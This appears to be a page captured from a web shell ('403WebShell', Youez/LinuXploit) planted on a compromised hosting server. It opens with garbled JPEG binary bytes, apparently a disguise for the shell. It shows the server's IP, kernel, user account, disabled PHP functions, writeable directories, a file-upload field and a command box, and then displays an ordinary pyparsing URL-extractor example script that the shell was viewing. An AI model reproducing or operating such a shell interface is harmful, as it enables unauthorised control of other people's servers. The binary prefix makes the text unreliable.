JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 88.222.222.202  /  Your IP : 216.73.216.217
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/gsutil/third_party/pyparsing/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/gsutil/third_party/pyparsing/examples/urlExtractorNew.py
# URL extractor
# Copyright 2004, Paul McGuire
from collections import Counter
import pprint
from urllib.request import urlopen

from pyparsing import makeHTMLTags, pyparsing_common as ppc, FollowedBy, trace_parse_action

# Define the pyparsing grammar for a URL, that is:
#    URLlink ::= <a href= URL>linkText</a>
#    URL ::= doubleQuotedString | alphanumericWordPath
# Note that whitespace may appear just about anywhere in the link.  Note also
# that it is not necessary to explicitly show this in the pyparsing grammar; by default,
# pyparsing skips over whitespace between tokens.
linkOpenTag, linkCloseTag = makeHTMLTags("a")
link = linkOpenTag + linkOpenTag.tag_body("body") + linkCloseTag.suppress()


# Add a parse action to expand relative URLs
def expand_relative_url(t):
    url = t.href
    if url.startswith("//"):
        url = "https:" + url
    elif url.startswith(("/", "?", "#")):
        url = "https://www.cnn.com" + url

    # Put modified URL back into input tokens
    t["href"] = url


link.add_parse_action(expand_relative_url)

# Go get some HTML with some links in it.
with urlopen("https://www.cnn.com/") as serverListPage:
    htmlText = serverListPage.read().decode()

# scanString is a generator that loops through the input htmlText, and for each
# match yields the tokens and start and end locations (for this application, we are
# not interested in the start and end values).
for toks, strt, end in link.scanString(htmlText):
    print(toks.startA.href, "->", toks.body)

# Create dictionary with a dict comprehension, assembled from each pair of tokens returned
# from a matched URL.
links = {toks.body: toks.href for toks, _, _ in link.scanString(htmlText)}
pprint.pprint(links)

# Parse the urls in the links using pyparsing_common.url, and tally up all
# the different domains in a Counter.
domains = Counter()
for url in links.values():

    print(url)
    parsed = ppc.url.parseString(url)

    # print parsed fields for each new url
    if parsed.host not in domains:
        print(parsed.dump())
        print()

    # update domain counter
    domains[parsed.host] += 1


# Print out a little table of all the domains in the urls
max_domain_len = max(len(d) for d in domains)
print()
print("{:{}s}  {}".format("Domain", max_domain_len, "Count"))
print("{:=<{}}  {:=<5}".format("", max_domain_len, ""))

for domain, count in domains.most_common():
    print("{:{}s}  {:5d}".format(domain, max_domain_len, count))

Youez - 2016 - github.com/yon3zu
LinuXploit